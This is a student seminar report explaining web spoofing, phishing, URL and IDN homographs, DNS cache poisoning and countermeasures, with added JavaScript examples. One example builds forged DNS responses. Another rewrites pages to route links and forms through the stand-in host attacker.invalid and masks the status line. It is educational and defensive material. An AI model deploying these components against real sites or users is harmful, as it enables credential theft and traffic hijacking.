Web Spoooofing

Seminar report, Division of Computer Engineering. Uploaded 30-May-2018 by ananthadiga; 24 pages. Transcript of the document (printed 8/14/2019):

ABSTRACT

Web spoofing is an Internet security attack that endangers the privacy of World Wide Web users and the integrity of their data. The attack can be carried out on today's systems, against users of the most common Web browsers. Web spoofing allows an attacker to create a "shadow copy" of the entire World Wide Web. Accesses to the shadow Web are funneled through the attacker's machine, allowing the attacker to monitor all of the victim's activities, including any passwords or account numbers the victim enters. The attacker can also cause false or misleading data to be sent to Web servers in the victim's name, or to the victim in the name of any Web server. In short, the attacker observes and controls everything the victim does on the Web.

The attack has two parts. First, the attacker causes a browser window to be created on the victim's machine, with some of the normal status and menu information replaced by identical-looking components supplied by the attacker. Then, the attacker causes all Web pages destined for the victim's machine to be routed through the attacker's server. On the attacker's server, the pages are rewritten in such a way that their appearance does not change at all, but any action taken by the victim is logged by the attacker. In addition, any attempt by the victim to load a new page causes the newly loaded page to be routed through the attacker's server as well, so the attack continues on the new page.

1. INTRODUCTION

Web spoofing is a security attack that allows an adversary to observe and modify all web pages sent to the victim's machine, and to observe all information entered into


forms by the victim. Web spoofing works on both of the major browsers and is not prevented by "secure" connections: the attacker can observe and modify all web pages and form submissions even when the browser's "secure connection" indicator is lit. The user sees no indication that anything is wrong.

The attack is implemented using JavaScript and Web server plug-ins, and works in two parts. First, the attacker causes a browser window to be created on the victim's machine, with some of the normal status and menu information replaced by identical-looking components supplied by the attacker. Then, the attacker causes all Web pages destined for the victim's machine to be routed through the attacker's server. On the attacker's server, the pages are rewritten in such a way that their appearance does not change at all, but any action taken by the victim (such as clicking on a link) is logged by the attacker. In addition, any attempt by the victim to load a new page causes the newly loaded page to be routed through the attacker's server, so the attack continues on the new page.

The attack is initiated when the victim visits a malicious Web page, or receives a malicious email message (if the victim uses an HTML-enabled email reader).

We have implemented a demonstration of the Web spoofing attack and have shown the demo live at the Internet World conference and on MSNBC television. Although the implementation is not trivial, it is well within the means of a single dedicated programmer. Current browsers do not prevent Web spoofing, and there seems to be little movement in the direction of addressing this problem. We believe that there can be no secure electronic commerce on the Web until the Web spoofing vulnerability has been addressed. Many false claims have been made about Web spoofing, and some people who make public statements about Web spoofing do not understand the


full scope of the problem. If you want to understand Web spoofing, please read my seminar report on this topic. I worked hard to make it accessible to non-experts.

2. PREVIOUS WORK

As early as 1996, Felten et al. at Princeton [8] originated the term web spoofing and explored spoofing attacks on Netscape Navigator and Microsoft Internet Explorer that allowed an attacker to create a shadow copy of the true Web. When the victim accesses the shadow Web through the attacker's servers, the attacker can monitor all of the victim's activities and obtain or modify the information the victim enters, including passwords or credit card numbers. Source code is not available; according to the paper, the attack used JavaScript to rewrite the hyperlink information shown on the status bar; to hide the real location bar and replace it with a fake one that also accepts keyboard input, allowing the victim to type in URLs normally (which then get rewritten to go to the attacker's machine); and to replace the Document Source button on the menu bar (to show the source the victim expects, not the real source). Apparently unable to spoof the SSL icon, the Princeton attack spoofed SSL by having the user open a real SSL session to the attacker's machine.

In 1996, Tygar and Whitten from CMU [20] demonstrated how a Java applet or similar remote execution can be used as a Trojan horse. The Java applet could be inserted into a client machine through a bogus remote page and pop up a dialog window similar to the true login window. With the active text field on top of the image, the Trojan horse applet would capture the keyboard input and transfer it to the attacker's machine. Tygar and Whitten also gave a way to prevent these attacks: window personalization.


3. TYPES OF SPOOFING

There are different types of spoofing, such as IP spoofing, email spoofing and web spoofing; a short introduction to each is given below.

3.1 IP spoofing: The attacker uses the IP address of another computer to acquire information or gain access. IP spoofing is the creation of TCP/IP packets with somebody else's IP address in the header. Routers use the destination IP address to forward packets, but (unless they apply ingress filtering of the kind described in BCP 38) ignore the source IP address. The source IP address is used only by the destination machine, when it responds back to the source. When an attacker spoofs someone's IP address, the victim's reply goes back to that address. Since the attacker does not receive the packets back, this is called a one-way attack or blind spoofing. To see the return packets, the attacker must intercept them.

3.2 Email spoofing: The attacker sends email but makes it appear to come from someone else. With email spoofing, someone receives email that appears to have originated from one source when it actually was sent from another. Purposes of email spoofing:

  - Hiding the sender's identity
  - Impersonating someone
  - Implicating someone
  - Tricking someone into making a damaging statement or releasing sensitive information

Note that anonymous email can also be sent using an anonymous remailer (a common spam vehicle).

3.3 Web spoofing: The attacker tricks the web browser into communicating with a different web server than the user intended.


Web spoofing is tricking someone into visiting a web site other than the one they intend to, while mimicking the intended site. In this way, an attacker may obtain confidential information. They can also provide false or misleading information. They can even present a shadow copy of the whole Web to the victim.

3.4 URL spoofing: URL spoofing deals with the different ways of making a spoofed site's URL resemble a genuine site's URL. In doing so, the attacker has a better chance of succeeding, especially with inexperienced users who are unfamiliar with phishing. One way of masking the URL is to include a user name and password. Web servers that require authentication may be accessed using the URL format username:password@host. A user name and password in a URL may be used regardless of whether the web server enforces authentication; the information is simply ignored if not. User names are not limited to letters and numbers, so for instance www.paypal.com is a valid choice. Consequently, an attacker could construct a URL such as http://www.paypal.com:80@192.168.0.1/, where www.paypal.com is the user name, 80 is the password, and 192.168.0.1 is the malicious site. It is also possible to omit the password completely. The method is, however, not used as much anymore, as browsers now warn when a user name and password appear in the URL (and that a phishing attempt may be taking place), or strip or refuse such URLs outright.

3.5 IDN spoofing: Since the introduction of internationalized domain names (IDN), domain names may also include country-specific characters. Unfortunately, some foreign-language characters look almost the same as certain Latin characters, and may therefore also be used in phishing attempts. Not only does this allow attackers to register domain names that look exactly like another, but it also


allows the use of security certificates which appear to be for a legitimate domain. A good example is the paypal.com case in which the Cyrillic а replaces the Latin a: http://www.pаypal.com/. In Unicode, decimal 1072 (U+0430) is the Cyrillic small letter a.

For Unicode strings to be mapped into the limited character set supported by the DNS (domain name system), Punycode is used. Punycode is applied to each component of a domain name (subdomain, domain name and top-level domain) that contains characters not found in the ASCII character set. Each translated Punycode label is given the prefix xn--; the non-ASCII characters are removed from the label and encoded as a trailing code. Using the same example as above, the result would be www.xn--pypal-4ve.com. Because Punycode enables web sites to use full Unicode names, web browsers including Firefox and Opera adopted a white-list of TLDs that have policies for which characters are permitted and procedures for making sure that no homographic domains are registered to two different entities. While a white-listed TLD is displayed in Unicode, any untrusted TLD is displayed in Punycode with the xn-- prefix. Dot com is not part of this list and will therefore be displayed in Punycode. Current browsers have largely replaced the TLD white-list with per-label checks, displaying a label in Punycode when it mixes scripts (for example Latin with Cyrillic) or contains confusable characters.
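The userinfo trick of 3.4 and the Punycode conversion of 3.5 can both be observed with the WHATWG URL parser that Node.js ships as the global URL class. The block below is an added example written for this page, not code from the report or from any browser. The sample URLs are constructed, and the script-mixing rule (flag a label that combines Latin with Cyrillic or Greek letters) is a deliberately simplified stand-in for the display policies real browsers apply.

```javascript
'use strict';
// Added example (not from the report): inspect a URL the way a cautious
// browser should, using only the WHATWG URL parser that Node.js exposes as
// the global URL class. It reports the user:pass@host trick from section 3.4
// and the Punycode conversion of IDN labels from section 3.5, and flags labels
// that mix Latin letters with Cyrillic or Greek ones (a simplified version of
// the per-label policy modern browsers apply). Sample URLs are constructed.

const SCRIPTS = {
  latin: /\p{Script=Latin}/u,
  cyrillic: /\p{Script=Cyrillic}/u,
  greek: /\p{Script=Greek}/u,
};

// Which of the three scripts appear in one label, e.g. ['latin', 'cyrillic'].
function scriptsIn(label) {
  return Object.keys(SCRIPTS).filter((name) => SCRIPTS[name].test(label));
}

// Recover the host as the user saw it (before the parser turned it into
// Punycode): strip scheme, optional userinfo, path/query/fragment and port.
function displayedHost(raw) {
  return raw
    .replace(/^[a-z][a-z0-9+.-]*:\/\/(?:[^@/?#]*@)?/i, '')
    .split(/[/?#]/)[0]
    .replace(/:\d*$/, '');
}

function inspectUrl(raw) {
  const u = new URL(raw);
  const shownLabels = displayedHost(raw).split('.');
  const mixed = shownLabels.filter((label) => scriptsIn(label).length > 1);
  const punycode = u.hostname.split('.').filter((label) => label.startsWith('xn--'));
  return {
    hostname: u.hostname,          // where the connection actually goes (ASCII form)
    username: u.username,          // non-empty means the URL carried userinfo
    password: u.password,
    punycodeLabels: punycode,      // labels the parser had to encode
    mixedScriptLabels: mixed,      // labels that combine scripts: homograph candidates
    suspicious: u.username !== '' || mixed.length > 0,
  };
}

// Demo with the two cases from the text (constructed, not real sites).
console.log(inspectUrl('http://www.paypal.com:80@192.168.0.1/'));
console.log(inspectUrl('http://www.p\u0430ypal.com/')); // Cyrillic а (U+0430) in place of Latin a
```

For the first URL the parser reports hostname 192.168.0.1 with username www.paypal.com, which is exactly the split the text describes; for the second it reports hostname www.xn--pypal-4ve.com, the Punycode form a browser would show for an untrusted TLD. The mixed-script rule has a known limit: a label written entirely in one non-Latin script out of confusable letters passes it, which is why browsers additionally keep confusable-character tables.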

3.6 DNS spoofing: DNS spoofing or cache poisoning attacks are attacks in which attackers attempt to feed incorrect mappings between IP addresses and host names to a DNS server. As DNS queries are usually submitted over UDP, servers cannot rely on the transport protocol to maintain the state of a DNS connection. Therefore, in order to match a response with a query, DNS servers include a numeric query ID in the DNS payload. If the attacker can predict the query ID, it is possible to craft a spoofed response that arrives before the real response is returned to the DNS server. The


DNS server believes the first response it receives and discards any additional responses, which are considered duplicates. Consequently, anyone who looks up the spoofed domain record is redirected to the attacker's site.

Another way of performing a DNS cache poisoning attack is on the victim's computer. Every system has a hosts file in its system directory used to associate host names with IP addresses. This is actually the job of a DNS server, but by adding records to the hosts file one may hard-code domain name translations and redirect users to different sites. The hosts file is located at %SystemRoot%\system32\drivers\etc\hosts in the Windows environment, and at /etc/hosts on UNIX-based systems. Each line in the hosts file represents an entry. The first column specifies the IP address, followed by the corresponding host name. Most systems map localhost to the loopback address as shown below.

    127.0.0.1 localhost

Normally, when you attempt to access domain.com, a request is sent to a DNS server to find out the IP address for that domain name. Once this has been done, the HTTP request is forwarded to the proper web server. However, if we were to insert a custom entry for domain.com in the hosts file, the request would be forwarded to this address instead:

    127.0.0.1 localhost
    192.168.0.2 domain.com

An attacker could use this method to direct users to a web site that he or she controls, even if the victim types http://domain.com in the address bar of the web browser.
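The query-ID race described in 3.6 can be made concrete without touching the network. The block below is an added example written for this page, not code from the report: it frames a DNS query and a forged response as raw bytes, parses the forged response the way a resolver would, and shows the acceptance rule with and without source-port matching. The domain bank.example, the address 192.168.0.2 and the port numbers are constructed for the demonstration.

```javascript
'use strict';
// Added example (not from the report): DNS query/response framing in Node.js,
// showing why a predictable query ID lets an attacker forge the answer that a
// resolver accepts. Everything is built in memory with Buffer; nothing is sent.
// bank.example and 192.168.0.2 are constructed names and addresses.

// name -> length-prefixed labels terminated by a zero byte (RFC 1035 3.1)
function encodeName(name) {
  const labels = name.replace(/\.$/, '').split('.');
  const parts = labels.map((l) => Buffer.concat([Buffer.from([l.length]), Buffer.from(l, 'ascii')]));
  return Buffer.concat([...parts, Buffer.from([0])]);
}

// Reads labels at offset; follows one 0xC0xx compression pointer if present.
function decodeName(buf, offset) {
  const labels = [];
  let pos = offset;
  for (;;) {
    const len = buf[pos];
    if (len === 0) { pos += 1; break; }
    if ((len & 0xc0) === 0xc0) {
      labels.push(decodeName(buf, buf.readUInt16BE(pos) & 0x3fff).name);
      pos += 2;
      break;
    }
    labels.push(buf.toString('ascii', pos + 1, pos + 1 + len));
    pos += 1 + len;
  }
  return { name: labels.join('.'), end: pos };
}

// Victim resolver side: a standard A query with the given transaction ID.
function buildQuery(id, name) {
  const header = Buffer.alloc(12);
  header.writeUInt16BE(id, 0);
  header.writeUInt16BE(0x0100, 2); // flags: QR=0, RD=1
  header.writeUInt16BE(1, 4);      // QDCOUNT
  return Buffer.concat([header, encodeName(name), Buffer.from([0, 1, 0, 1])]); // QTYPE A, QCLASS IN
}

// Attacker side: reuse the (predicted or sniffed) ID and question section,
// and append one A record pointing at the attacker's host.
function forgeResponse(queryBuf, attackerIp, ttl = 3600) {
  const id = queryBuf.readUInt16BE(0);
  const questionEnd = decodeName(queryBuf, 12).end + 4;
  const header = Buffer.alloc(12);
  header.writeUInt16BE(id, 0);
  header.writeUInt16BE(0x8180, 2); // QR=1, RD=1, RA=1, RCODE=0
  header.writeUInt16BE(1, 4);      // QDCOUNT
  header.writeUInt16BE(1, 6);      // ANCOUNT
  const rr = Buffer.alloc(16);
  rr.writeUInt16BE(0xc00c, 0);     // NAME: pointer to the question name at offset 12
  rr.writeUInt16BE(1, 2);          // TYPE A
  rr.writeUInt16BE(1, 4);          // CLASS IN
  rr.writeUInt32BE(ttl, 6);        // TTL: a long TTL keeps the poisoned entry cached
  rr.writeUInt16BE(4, 10);         // RDLENGTH
  attackerIp.split('.').forEach((octet, i) => { rr[12 + i] = Number(octet); });
  return Buffer.concat([header, queryBuf.subarray(12, questionEnd), rr]);
}

// Parses the header, the question name and every A record in the answer section.
function parseResponse(buf) {
  const id = buf.readUInt16BE(0);
  const ancount = buf.readUInt16BE(6);
  const question = decodeName(buf, 12);
  let pos = question.end + 4;
  const addresses = [];
  for (let i = 0; i < ancount; i++) {
    pos = decodeName(buf, pos).end;
    const type = buf.readUInt16BE(pos);
    const rdlen = buf.readUInt16BE(pos + 8);
    pos += 10;                     // TYPE, CLASS, TTL, RDLENGTH
    if (type === 1 && rdlen === 4) addresses.push([...buf.subarray(pos, pos + 4)].join('.'));
    pos += rdlen;
  }
  return { id, name: question.name, addresses };
}

// Resolver acceptance check. With matchPort=false this is the old rule the
// text describes: any datagram whose ID and question match wins the race.
// With matchPort=true the reply must also arrive on the random source port the
// query left from, so the attacker has to guess 32 bits instead of 16.
function acceptResponse(pending, responseBuf, arrivedOnPort, matchPort) {
  const r = parseResponse(responseBuf);
  if (r.id !== pending.id || r.name !== pending.name) return false;
  if (matchPort && arrivedOnPort !== pending.port) return false;
  return true;
}

// Demo: the victim asks for bank.example with a guessable ID; the attacker's
// forged reply is accepted by the old rule and rejected once ports must match.
const pending = { id: 0x1234, name: 'bank.example', port: 40123 };
const forged = forgeResponse(buildQuery(pending.id, pending.name), '192.168.0.2');
console.log(parseResponse(forged).addresses, acceptResponse(pending, forged, 40123, false),
  acceptResponse(pending, forged, 53, true));
```

The 16-bit ID is all the text relies on: an attacker who can predict it (sequential IDs, a weak generator) or who sprays many guesses ahead of the real reply wins the race under the matchPort=false rule. Since the Kaminsky attack of 2008 resolvers also randomize the UDP source port, which is the second check in acceptResponse; DNSSEC validation closes the gap for signed zones, because a forged A record carries no valid signature.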

3.7 Proxy spoofing: It is also possible to redirect users to malicious sites by defining proxies in the browser configuration. This is usually done by having the user install some sort of web extension (in fact a Trojan or spyware) which then overrides the settings present in the web browser.

    4.THREAT MODELS AND ATTACKS


The initial design of Internet and Web protocols assumed a benign environment, in which servers, clients and routers cooperate and follow the standard protocols, except for unintentional errors. However, as the amount and sensitivity of usage increased, concerns about security, fraud and attacks became important. In particular, since Internet access is now widely available, it is very easy for attackers to obtain many client and even host connections and addresses, and to use them to launch attacks on the network itself and on other hosts and clients. With the proliferation of commercial domain name registrars allowing automated, low-cost registration in most top-level domains, it is currently very easy for attackers to acquire essentially any unallocated domain name and place malicious hosts and clients there.

We call this the unallocated domain adversary: an adversary who is able to issue and receive messages using many addresses in any domain name, excluding the finite list of already allocated domain names. This is probably the most basic and common type of adversary.

Unfortunately, we believe, as explained below, that currently most web users are vulnerable even to unallocated domain adversaries. This claim may be surprising, as sensitive web sites are usually protected using the SSL or TLS protocols, which, as we explain in the following subsection, securely authenticate web pages even in the presence of intercepting adversaries. Intercepting adversaries are able to send and intercept messages to and from all domains. Indeed, even without SSL/TLS, the HTTP protocol securely authenticates web pages against spoofing adversaries, which are able to send messages from all domains but receive only messages sent to unallocated domains (the TCP handshake requires the responder to see the client's packets). However, the security provided by SSL/TLS is only with respect to the address (URL) and security mechanism (HTTPS, using SSL/TLS, or plain HTTP) requested by the application (usually the browser). In a phishing attack


(and most other spoofing attacks), the application specifies, in its request, the URL of the spoofed site. Namely, web spoofing attacks focus on the gap between the intentions and expectations of the user, and the address and security mechanism specified by the browser to the transport layer.

5. HOW WEB SPOOFING WORKS

Web spoofing is a kind of electronic con game in which the attacker creates a convincing but false copy of the entire World Wide Web. The false Web looks just like the real one: it has all the same pages and links. However, the attacker controls the false Web, so that all network traffic between the victim's browser and the Web goes through the attacker.

Consequences: Since the attacker can observe or modify any data going from the victim to Web servers, as well as controlling all return traffic from Web servers to the victim, the attacker has many possibilities. These include surveillance and tampering.

Surveillance: The attacker can passively watch the traffic, recording which pages the victim visits and the contents of those pages. When the victim fills out a form, the entered data is transmitted to a Web server, so the attacker can record that too, along with the response sent back by the server. Since most on-line commerce is done via forms, this means the attacker can observe any account numbers or passwords the victim enters. The attacker can carry out surveillance even if the victim has a "secure" connection (usually via Secure Sockets Layer) to the server, that is, even if the victim's browser shows the secure-connection icon (usually an image of a lock or a key).

Tampering: The attacker is also free to modify any of the data traveling in either direction between the victim and the Web. The attacker can modify form data


submitted by the victim. For example, if the victim is ordering a product on-line, the attacker can change the product number, the quantity, or the ship-to address. The attacker can also modify the data returned by a Web server, for example by inserting misleading or offensive material in order to trick the victim or to cause antagonism between the victim and the server.

6. SPOOFING THE WHOLE PAGE

[Fig 6.1: whole spoofed page]

In a spoofing attack, the attacker creates misleading context in order to trick the victim into making an inappropriate security-relevant decision. A spoofing attack is like a con game: the attacker sets up a false but convincing world around the victim. The victim does something that would be appropriate if the false world were real. Unfortunately, activities that seem reasonable in the false world may have disastrous effects in the real world.

Spoofing attacks are possible in the physical world as well as the electronic one. For example, there have been several incidents in which criminals set up bogus automated-teller machines, typically in the public areas of shopping malls. The machines would accept ATM cards and ask the person to enter their PIN code. Once the machine had the victim's PIN, it could either eat the card or "malfunction" and return the card. In either case, the criminals had enough information to copy the victim's card and use the duplicate. In these attacks, people were fooled by the context they saw: the location of the machines, their size and weight, the way they were decorated, and the appearance of their electronic displays.

People using computer systems often make security-relevant decisions based on contextual cues they see. For example, you might decide to type in your bank account number because you believe you are visiting your bank's Web page. This belief might arise because the page has a familiar look, because the bank's URL appears in the browser's location line, or for some other reason.


To appreciate the range and severity of possible spoofing attacks, we must look more deeply into two parts of the definition of spoofing: security-relevant decisions and context.

7. HOW DOES THE ATTACK WORK?

The first vulnerability is due to the validation that the server's public key, which SSL obtains from the server's certificate, belongs to the site with the given location (URL). This validation is the responsibility of the application (e.g. the browser) and not part of the SSL/TLS specifications; SSL/TLS merely passes the server's certificate to the application. Browsers are vulnerable to the false certificate attack, in which the adversary obtains, from a CA trusted by the browser, a certificate for the domain of the victim web page that contains a public key generated by the adversary. The adversary therefore holds the matching private key and can pass SSL server authentication for the victim web page.

We now explain how the false certificate attack works. In the current design of browsers, the user is responsible for validating the authenticity of web sites, by noting relevant status areas in the browser user interface. The relevant status areas are the location bar, containing the URL (Uniform Resource Locator), and the SSL indicator (typically an open lock for insecure sites and a closed lock for SSL/TLS-protected sites). We are mostly interested in the web spoofing attack, which exploits this vulnerability by directing the browser to an adversary-controlled clone site that resembles the original, victim site which the user wanted to access. Web spoofing attacks are very common, and are the most severe threat to secure e-commerce currently. As we explain below, most web spoofing attackers simply rely on the fact that many users may not notice an incorrect URL or


the lack of an SSL indicator when approaching their online banking site (or another sensitive site). Therefore, an attacker can circumvent SSL site authentication trivially, by not using SSL and/or by using a URL belonging to a domain owned or controlled by the attacker, for which the attacker can obtain a certificate. More advanced attacks can mislead even users that validate the SSL indicator and location bar (containing the URL).

[Fig 7.1: HTTP request/response process with SSL protection]

The first challenge for a web spoofing attack is to cause the browser to receive the clone site when the customer is really looking for the victim site. The attacker can exploit different parts of the process of receiving a (sensitive) web page. We illustrate the typical scenario of receiving a sensitive web page in Fig 7.1. The process begins when the user selects the web site, by entering its location (URL) or by invoking a bookmark or link, e.g. in an e-mail message (step 1a). The browser, or the underlying transport layer, then sends the name of the domain of the site, e.g. xxx.com, to a Domain Name Server (step 2a). The Domain Name Server returns the IP address of the site (step 2b). Now, the client sends an HTTP request to the site, using the IP address of the site (step 3a), and receives the HTTP response containing the web page (step 3b); these two steps are protected by SSL if the URL indicates the use of SSL (by using the https protocol in the URL). Finally, the browser presents the page to the user (step 1b). If SSL is not used, an intercepting adversary could attack all three pairs of steps in this process, as follows:

1. Trick the user into requesting the spoofed web site in step 1a, and/or into using http rather than https, i.e. not protecting the request and response using SSL.


2. Return an incorrect IP address for the web server in step 2b. This can be done by exploiting one of the known weaknesses of the DNS protocol and/or of (many) DNS servers. A typical example is DNS cache poisoning ("pushing" false domain-to-IP mappings into the cache of DNS servers).

3. Intercept (capture) the request in step 3a (sent to the right IP address) and return a response in step 3b from the spoofed site.

The third attack requires the adversary to intercept messages, which is relatively hard (it requires a "man in the middle", i.e. an intercepting adversary). The second attack requires defeating DNS security, which is often possible, but may be difficult (except for an intercepting adversary). Hence, most spoofing attacks against SSL/TLS-protected web sites focus on the first attack, i.e. tricking the user into requesting the spoofed web site and/or into using an insecure connection (without SSL) rather than an SSL-protected connection.

Most web spoofing attacks, however, use methods which require neither interception of messages to "honest" web sites nor corruption of servers or of the DNS response; these methods work even for the weak "unallocated domain" adversary. One method is URL redirection, due to Felten et al. [FB*97]. This attack begins when the user accesses any "malicious" web site controlled by the attacker, e.g. one offering some content; this is the parallel of Trojan software, except that users are less cautious about approaching untrusted web sites, as browsers are supposed to remain secure. The attack works if the user continues surfing by following links from this malicious site. The site provides modified versions of the requested pages, where all links invoke the malicious site, which redirects the queries to their intended target.


This allows the malicious site to continue inspecting and modifying requests and responses without the user noticing, as long as the user follows links. However, this attack requires the attacker to attract the user to the malicious web site. In practice, attackers usually use an even easier method to direct the user to the spoofed site: phishing spoofing attacks, usually using spam e-mail messages. In Fig 7.2 we describe the process of a typical phishing attack used to lure the user into a spoofed web site. The adversary first buys some unallocated domain name, often related to the name of the target (victim) web site. Then, the adversary sends spam (unsolicited e-mail) to many users; this spam contains a "phishing bait message", luring the user to follow a link embedded in the bait message. The mail message is a forgery: its source address is that of the victim entity, e.g. a bank that the user uses (or may use), and its contents attempt to coerce the user into following a link in the message, supposedly to the victim organization, but actually to the phishing site. If the victim entity signs all its e-mail, e.g. using S/MIME or PGP [Z95], then our techniques (described later on) could allow the user to detect this fraud. However, currently only a tiny fraction of organizations sign outgoing e-mail; therefore this is not an option, and many naive users may click on the link in the message, supposedly to an important service from the victim entity. The link actually connects the user to the spoofed web site, emulating the site of the victim entity, where the user provides information useful to the attacker, such as credit card number, name, e-mail addresses, and other information. The attacker stores the information in some "stolen information" database; among other usages, he


also uses the credit card number to purchase additional domains, and the e-mail addresses and name to create more convincing spam messages (e.g. to friends of this user).

Currently most phishing attacks lure users by using spam (unsolicited, undesirable e-mail), as described above. However, we define a phishing spoofing attack as (any method of) luring the user into directing his browser to a spoofed web site. For example, an attacker could use banner ads or other ads to lure users to the spoofed site.

[Fig 7.2: process of a typical phishing spoofing attack]

We believe spam is the main phishing tool simply because currently spam is extremely cheap and hard to trace back to the attacker. Spamming is causing many other damages, in particular waste of human time and attention, and of computer resources. Currently, the most common protection against spam appears to be content-based filtering; however, since phishing attacks emulate valid e-mail from (financial) service providers, we expect it to pass content-based filtering. Proposals for controlling and preventing spam, e.g. [CSRI04, He04], may also help to prevent or at least reduce spam-based phishing.

Most phishing spoofing attacks require only an unallocated web address and a server, but do not require intercepting (HTTP) requests of the user; therefore, even weak attackers can deploy them. This may explain their popularity. It also means that the domain name used in the phishing attack is different from the domain name of the victim organization.

8. COMPLETING THE ILLUSION

The attack as described thus far is fairly effective, but it is not perfect. There is still


some remaining context that can give the victim clues that the attack is going on. However, it is possible for the attacker to eliminate virtually all of the remaining clues of the attack's existence.

Such evidence is not too hard to eliminate because browsers are very customizable. The ability of a Web page to control browser behavior is often desirable, but when the page is hostile it can be dangerous. Another artifact of this kind of attack is that the pages returned by the attacker's intercept are stored in the user's browser cache, so, depending on the additional actions taken by the user, the spoofed pages may live on long after the session is terminated.

8.1 The Status Line:

The status line is a single line of text at the bottom of the browser window that displays various messages, typically about the status of pending Web transfers. The attack as described so far leaves two kinds of evidence on the status line. First, when the mouse is held over a Web link, the status line displays the URL the link points to. Thus, the victim might notice that a URL has been rewritten. Second, when a page is being fetched, the status line briefly displays the name of the server being contacted. Thus, the victim might notice that http://www.attacker.org is displayed when some other name was expected.

The attacker can cover up both of these cues by adding a JavaScript program to every rewritten page. Since JavaScript programs can write to the status line, and since it is possible to bind JavaScript actions to the relevant events, the attacker can arrange things so that the status line participates in the con game, always showing the victim what would have been on the status line in the real Web. Thus the spoofed context becomes even more convincing.
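The URL-rewriting step of the shadow Web (section 7, "URL redirection") and the status-line cover-up of 8.1 are both plain text transforms on the proxied page. The block below is an added example written for this page; it is not the Princeton demo's code (whose source was never released) or code from the report. The attacker host attacker.invalid, the splice-prefix URL format, the helper names and the sample page are assumptions made for the demonstration.

```javascript
'use strict';
// Added example (not from the report; the Princeton demo's source was never
// released): the page-rewriting step of the shadow-Web attack as a plain string
// transform, plus the status-line cover-up from section 8.1. The attacker host
// attacker.invalid, the splice-prefix URL format and the sample page are
// assumptions made for this demonstration.

const PROXY = 'http://attacker.invalid/';

// Absolute http(s) URLs get the proxy spliced onto the front; anything else
// (relative links, mailto:, javascript:) is left alone.
function rewriteUrl(url) {
  return /^https?:\/\//i.test(url) ? PROXY + url : url;
}

// Rewrites href/src/action attributes so every link, image and form on the
// page goes back through the proxy. For links, the onmouseover handler sets
// window.status to the original URL, hiding the rewrite from the status line.
function rewritePage(html) {
  return html.replace(/\b(href|src|action)\s*=\s*"([^"]*)"/gi, (match, attr, url) => {
    const spoofed = rewriteUrl(url);
    if (spoofed === url) return match;           // nothing to hide
    if (attr.toLowerCase() !== 'href') return `${attr}="${spoofed}"`;
    const shown = url.replace(/\\/g, '\\\\').replace(/'/g, "\\'");
    return `href="${spoofed}" onmouseover="window.status='${shown}';return true"`;
  });
}

// Proxy side: recover the page the victim actually wanted from a rewritten URL.
function originalUrl(spoofed) {
  return spoofed.startsWith(PROXY + 'http') ? spoofed.slice(PROXY.length) : null;
}

// Defender side: a "double scheme" URL (a host followed by a second scheme)
// is the fingerprint of this splice; a proxy or mail filter can flag it.
function looksRewritten(url) {
  return /^https?:\/\/[^/]+\/https?:\/\//i.test(url);
}

// Constructed sample page.
const SAMPLE = '<a href="https://bank.example/login">Log in</a>'
  + '<img src="https://bank.example/logo.png">'
  + '<form action="https://bank.example/transfer" method="post"></form>'
  + '<a href="/help">Help</a><a href="mailto:support@bank.example">Mail</a>';

console.log(rewritePage(SAMPLE));
```

Two caveats a practitioner should keep in mind. Relative links are left untouched here, which a real proxy cannot afford: a /help link on the rewritten page resolves to http://attacker.invalid/help, so the proxy must either absolutize relative URLs against the page's true origin or remember the last origin per victim. And current browsers ignore assignments to window.status and display the real link target themselves, so the status-line cover-up of 8.1 no longer works; the rewriting proxy itself, which is what looksRewritten detects, remains the core of reverse-proxy phishing.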

    8.2 The Location Line:


The browser's location line displays the URL of the page currently being shown. The victim can also type a URL into the location line, sending the browser to that URL. The attack as described so far causes a rewritten URL to appear in the location line, giving the victim a possible indication that an attack is in progress.

This clue can be hidden using JavaScript. A JavaScript program can hide the real location line and replace it with a fake location line which looks right and is in the expected place. The fake location line can show the URL the victim expects to see. The fake location line can also accept keyboard input, allowing the victim to type in URLs normally. Typed-in URLs can be rewritten by the JavaScript program before being accessed.

[Fig. 8.1: spoofed web page]

8.3 Viewing the Document Source:

There is one clue that the attacker cannot eliminate, but it is very unlikely to be noticed. By using the browser's "view source" feature, the victim can look at the HTML source for the currently displayed page. By looking for rewritten URLs in the HTML source, the victim can spot the attack. Unfortunately, HTML source is hard for novice users to read, and very few Web surfers bother to look at the HTML source for documents they are visiting, so this provides very little protection.

A related clue is available if the victim chooses the browser's "view document information" menu item. This will display information including the document's real URL, possibly allowing the victim to notice the attack. As above, this option is almost never used, so it is very unlikely that it will provide much protection.

9. COUNTERMEASURES


    We first consider short-term solutions.

9.1 Disable JavaScript. Known Web spoofing techniques depend mostly on JavaScript. If the user disables the browser's JavaScript, this attack is denied. However, modern web pages rely on JavaScript so much that many feel disabling it is impractical for general Web surfing (although one of the authors does this anyway). Users should also take care that a browser's "disable JavaScript" option actually disables JavaScript; an author personally encountered a Netscape platform that ignored the user's option.

9.2 Customization. Tygar and Whitten suggested customization as a countermeasure against Trojan Horse applets. Customization of browser settings is also an effective way to enable users to detect Web spoofing. Although unsigned JavaScript can detect the platform and browser which the client is using, we do not yet know how to use it to detect the detailed window settings which may affect the browser display. The browser Opera has a more customizable interface than other browsers. From this point of view, Opera is more secure than other browsers.

9.3 Disable pop-up windows. Disabling pop-up windows can stop web spoofing from opening a new window completely controlled by the attacker. Unfortunately, disabling pop-ups is only implemented as an option in the browser Konqueror, which comes with KDE 2.0, only for Linux. However, one lesson from our work is that browser-server interaction is such a rich space that one should be cautious about asserting that any particular barrier can render certain behaviors impossible, especially since the behavior in question is not what happens in the platform but rather what appears, to the user, to be happening.

9.4 Long-term solutions. Our initial motivation was not to attack but to defend: to build a better browser that, for example, could clearly indicate security attributes of a server (and so enable clients to securely use our server hardening techniques [14, 15, 19]). None of the above solutions are strong enough to be a general solution for preventing web spoofing. An ideal browser should be a platform which can enable all the modern web techniques to be fully functional, and at the same time supply unspoofable features to indicate the communication security.

10. FUTURE SPOOFING WORK
Our fake Web pages are not perfect. In our demonstration, we only implement enough to prove the concept; however, as noted earlier, we are not yet able to forge some aspects of legitimate browser behavior:

- Creating convincing editable location lines appears to depend on the user preferences, which we cannot yet learn. Either we gamble, or we do not have editable lines.
- We cannot yet obtain the user's genuine history information for the pull-down history options.
- If the user resizes our fake Netscape windows, the content will not behave as expected.
- As Netscape 6, with its modifiable formats, grows in popularity, we need to examine how to provide spoofed material that either matches the user's format, or does not cause undue alarm.

11. IMPLICATIONS
11.1 What are the current risks to Web users?
